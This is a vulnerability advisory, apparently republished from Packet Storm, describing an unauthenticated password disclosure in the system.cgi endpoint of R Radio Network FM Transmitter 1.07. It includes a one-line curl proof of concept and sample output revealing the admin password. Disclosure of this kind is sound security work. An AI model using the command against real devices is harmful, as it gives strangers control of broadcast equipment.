R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure
2023-12-4 21:59:37 Author: packetstormsecurity.com(查看原文) 阅读量:4 收藏

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure
Posted Dec 4, 2023
Authored by LiquidWorm | Site zeroscience.mk

R Radio Network FM Transmitter version 1.07 suffers from an improper access control that allows an unauthenticated actor to directly reference the system.cgi endpoint and disclose the clear-text password of the admin user allowing authentication bypass and FM station setup access.

tags | exploit, cgi
SHA-256 | 957fbcd8e2322bfb4df06832e6de97007a8bedfc7567ee79382899cdc5a7a54d
Download | Favorite | View

R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure

Vendor: R Radio Network
Product web page: http://www.pktc.ac.th
Affected version: 1.07

Summary: R Radio FM Transmitter that includes FM Exciter and
FM Amplifier parameter setup.

Desc: The transmitter suffers from an improper access control
that allows an unauthenticated actor to directly reference the
system.cgi endpoint and disclose the clear-text password of the
admin user allowing authentication bypass and FM station setup
access.

Tested on: CSBtechDevice

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2023-5802
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5802.php

09.10.2023

--

$ curl -s http://192.168.70.12/system.cgi
<html><head><title>System Settings</title>
...
...
Password for user 'admin'</td><td><input type=password name=pw size=10 maxlength=10 value="testingus"></td>
...
...
$

File Tags

Systems


文章来源: https://packetstormsecurity.com/files/176044/ZSL-2023-5802.txt
如有侵权请联系:admin#unsafe.sh